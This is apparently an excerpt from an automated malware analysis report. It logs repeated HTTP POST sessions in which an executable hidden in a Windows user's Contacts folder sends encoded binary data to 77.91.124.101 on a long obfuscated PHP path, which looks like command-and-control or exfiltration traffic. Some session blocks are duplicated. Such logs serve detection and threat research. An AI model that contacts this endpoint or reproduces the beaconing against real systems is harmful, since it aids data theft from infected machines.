                                                            Data Ascii: RZXQ^__Y]WUWUWWRPXXIV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*85<*^/4%#:_)#*P'!$"U-(6^(-.&G''^)
                                                            Nov 21, 2023 04:48:35.399066925 CET | 569 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:35 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            103 | 192.168.2.5 | 49818 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:35.722460985 CET | 570 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:35.920638084 CET | 570 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:35.921303988 CET | 572 | OUT | Data Raw: 57 5d 58 51 5b 58 5a 5b 5d 57 55 57 55 5e 57 5a 50 5c 58 44 56 57 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]XQ[XZ[]WUWU^WZP\XDVWW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*^)Y=(1)88#*<>3==0-8*\?</&G''^)
                                                            Nov 21, 2023 04:48:36.124488115 CET | 573 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:35 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            104 | 77.91.124.101 | 80 | 192.168.2.5 | 49819 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:36.454344034 CET | 573 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:36.651806116 CET | 574 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:36.652051926 CET | 576 | OUT | Data Raw: 52 5f 58 5c 5b 53 5a 50 5d 57 55 57 55 5e 57 55 50 5b 58 42 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X\[SZP]WUWU^WUP[XBV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*;)Y<89?##;&#\&<&R'>1'>-;><,,.&G''^)?
                                                            Nov 21, 2023 04:48:36.858058929 CET | 577 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:36 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            105 | 77.91.124.101 | 80 | 192.168.2.5 | 49820 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:37.176589012 CET | 578 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:37.373348951 CET | 578 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:37.373555899 CET | 580 | OUT | Data Raw: 57 59 5d 5a 5b 59 5a 5f 5d 57 55 57 55 5a 57 56 50 5d 58 45 56 54 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY]Z[YZ_]WUWUZWVP]XEVTWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$==X<.R=07/7.79:?U!3=9$0%98>^?88>&G''^)7
                                                            Nov 21, 2023 04:48:37.576966047 CET | 581 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:37 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            105 | 192.168.2.5 | 49820 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:37.176589012 CET | 578 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:37.373348951 CET578INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:37.373555899 CET580OUTData Raw: 57 59 5d 5a 5b 59 5a 5f 5d 57 55 57 55 5a 57 56 50 5d 58 45 56 54 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY]Z[YZ_]WUWUZWVP]XEVTWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$==X<.R=07/7.79:?U!3=9$0%98>^?88>&G''^)7
                                                            Nov 21, 2023 04:48:37.576966047 CET581INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:37 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            106 | 77.91.124.101 | 80 | 192.168.2.5 | 49821 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:37.894817114 CET | 581 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:38.093694925 CET | 582 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:38.093915939 CET | 584 | OUT | Data Raw: 52 5f 5d 5d 5b 5f 5f 5a 5d 57 55 57 55 5b 57 52 50 52 58 40 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_]][__Z]WUWU[WRPRX@VTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>82(9?0'[8$&\7*]) %'W&0:R,;><,;^/&G''^)3
                                                            Nov 21, 2023 04:48:38.297655106 CET | 584 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:37 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            107 | 192.168.2.5 | 49822 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:38.613940001 CET | 585 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:38.811933994 CET | 586 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:38.812347889 CET | 588 | OUT | Data Raw: 52 5a 58 50 5e 5e 5a 5e 5d 57 55 57 55 5e 57 57 50 5b 58 44 56 56 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXP^^Z^]WUWU^WWP[XDVVW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(5<-*#\8B6 9>)0!$-!$#9-8!<<7/.&G''^)7
                                                            Nov 21, 2023 04:48:39.015322924 CET | 588 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            108 | 77.91.124.101 | 80 | 192.168.2.5 | 49823 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:39.338498116 CET | 589 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:39.537868023 CET | 589 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:39.538080931 CET | 592 | OUT | Data Raw: 57 5d 58 5e 5b 5d 5a 5d 5d 57 55 57 55 5a 57 50 50 5c 58 49 56 51 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]X^[]Z]]WUWUZWPP\XIVQW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+(!Y=+W*3;2799(3-$.&& ":?Z ,>&G''^)7
                                                            Nov 21, 2023 04:48:39.741638899 CET | 593 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            109 | 77.91.124.101 | 80 | 192.168.2.5 | 49824 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:39.740168095 CET | 593 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:39.937958002 CET | 594 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:39.938183069 CET | 595 | OUT | Data Raw: 57 5c 5d 5b 5b 59 5f 5a 5d 57 55 57 55 5c 57 55 50 53 58 44 56 56 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\][[Y_Z]WUWU\WUPSXDVVWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_);5<+*S)7Z/.\79)^+!'[9'9(=<_8&G''^)/
                                                            Nov 21, 2023 04:48:40.140853882 CET | 599 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 03 25 3c 2c 5d 21 33 3f 1f 3c 2a 0c 08 2d 2e 25 18 2a 30 31 59 25 13 20 5f 24 07 04 08 3c 3f 2b 01 24 29 0e 54 20 18 01 05 2b 30 21 5a 0c 1d 26 17 36 16 0d 55 29 3d 38 5a 2b 13 28 17 31 08 3b 5e 28 58 2f 1b 20 30 33 5d 26 1d 30 51 2f 01 08 07 2e 16 32 41 31 05 21 07 23 2d 23 5f 0c 14 24 0b 36 32 2f 5e 34 30 32 50 22 0e 34 5d 20 0a 37 54 27 3d 34 56 26 38 2d 1a 2b 2b 2c 54 25 27 2f 0e 33 3a 33 1f 25 2a 37 51 28 00 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !%<,]!3?<*-.%*01Y% _$<?+$)T +0!Z&6U)=8Z+(1;^(X/ 03]&0Q/.2A1!#-#_$62/^402P"4] 7T'=4V&8-++,T%'/3:3%*7Q(&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            11 | 192.168.2.5 | 49723 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:33.223157883 CET | 185 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:33.420999050 CET | 186 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:33.421247959 CET | 188 | OUT | Data Raw: 57 58 58 5c 5b 5e 5f 5c 5d 57 55 57 55 5b 57 54 50 5e 58 40 56 50 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX\[^_\]WUWU[WTP^X@VPWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>8+;)>3'Z8'2[#:6)#.'=>30,8"^<';>&G''^)3
                                                            Nov 21, 2023 04:47:33.625627041 CET | 188 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:33 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            110 | 77.91.124.101 | 80 | 192.168.2.5 | 49825 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:39.892560959 CET | 594 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:40.090172052 CET | 596 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:40.090675116 CET598OUTData Raw: 57 5c 5d 5a 5b 53 5a 5b 5d 57 55 57 55 56 57 56 50 53 58 47 56 56 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\]Z[SZ[]WUWUVWVPSXGVVWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+([<]1?0<8'2] )%_+-&--09"(\8.&G''^)
                                                            Nov 21, 2023 04:48:40.297071934 CET | 599 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            111 | 77.91.124.101 | 80 | 192.168.2.5 | 49826 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:40.611051083 CET | 600 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:40.808887005 CET | 600 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:40.809181929 CET603OUTData Raw: 57 59 58 5a 5b 5e 5a 5f 5d 57 55 57 55 5c 57 56 50 52 58 41 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYXZ[^Z_]WUWU\WVPRXAVTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*=^<]%>#/"\ 9(3&W'>P0U9(>+<7],&G''^)/
                                                            Nov 21, 2023 04:48:41.011790991 CET | 603 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:40 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            112 | 192.168.2.5 | 49827 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:41.333384037 CET | 604 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:41.532224894 CET | 604 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:41.532480001 CET606OUTData Raw: 52 58 58 59 5b 5f 5f 59 5d 57 55 57 55 5d 57 56 50 52 58 47 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXXY[__Y]WUWU]WVPRXGVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=>?>V*#88'2\45(#='>&' .S,(*(?(->&G''^)+
                                                            Nov 21, 2023 04:48:41.736088991 CET | 607 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:41 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            113 | 192.168.2.5 | 49828 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:42.070585966 CET | 608 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
